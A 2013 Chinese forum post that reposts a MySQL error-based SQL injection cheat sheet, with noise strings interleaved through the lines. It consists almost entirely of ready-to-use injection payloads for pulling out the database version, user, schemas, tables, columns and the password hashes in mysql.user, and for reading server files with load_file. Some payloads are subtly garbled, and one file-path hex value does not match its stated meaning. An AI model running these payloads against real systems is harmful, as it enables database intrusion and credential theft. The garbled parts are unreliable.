Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
( c, S8 e7 C, f! K) S

+ D/ W+ ^0 `. k; lMysql暴错注入参考（pdf），每天一贴。。。
( G1 h5 _4 w1 q$ w
MySql Error Based Injection Reference
[Mysql暴错注入参考]
Authornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
7 q5 s9 E; r/ e! ?( C! BTeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
* T+ p! F# v& L3 |小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
) [5 d) }" N: Mjoin+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
7 c7 A2 D6 x! f5 a查询当前用户:
/ }, }& T, S; X3 \1 AMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
4 B6 L% x9 l, I8 Q3 e6 ^Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
# f/ h+ ]. I$ [2 {" b) _and(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
8 S: L7 [% Y6 G; d0 lMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
+ m) R2 w/ ?  ~4 t* B$ J/ \依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
& X) x0 X; h) K( t( M6 m- R. b' JLIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
顺序替换
5 a1 p6 b- k6 J% L# d+ t爆指定库数目:
8 S4 z8 ^9 l# Z1 M3 Q8 |* j; Pand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
" L' ]9 U7 Z) y% Pable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
6 ~1 o) f1 d& W$ A" @$ O+by+x)a)+and+1=1 0x6D7973716C=mysql
0 ?5 H- i2 N5 a$ F- ^3 C依次爆表:
# w6 n. D/ K8 C% m0 nand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
$ t  n% \/ Q- o/ M0 O! S8 Lable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
2 E* E$ b: R( J0x6D7973716C=Mysql 将n顺序替换
爆表内字段数目:
  B* R* M+ k+ k) d% oand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
% `2 Q6 K  X) w9 G! B+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
$ H* W& h7 q; x; O0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0 W' d6 I0 F2 v5 M) Q; g( ]- T+ t6 j依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
5 i. Y8 q9 M# o/ O5 H% o  vloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
& i9 }; u9 l3 i  W; ?1 j- D& L! D依次暴内容:
% ^$ P: Q+ Z# p+ C- y5 eand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
; M# V) m) g$ F* H- Ema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
* f5 E6 A" i$ b' \) ~将n顺序替换
1 I5 w( H/ t& n爆文件内容:
/ s7 x8 P2 n) k0 g! qand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
Thx for reading.
/ B/ g: i. p0 O- n7 m' I
( u  T6 @6 s; \+ \不要下载也可以，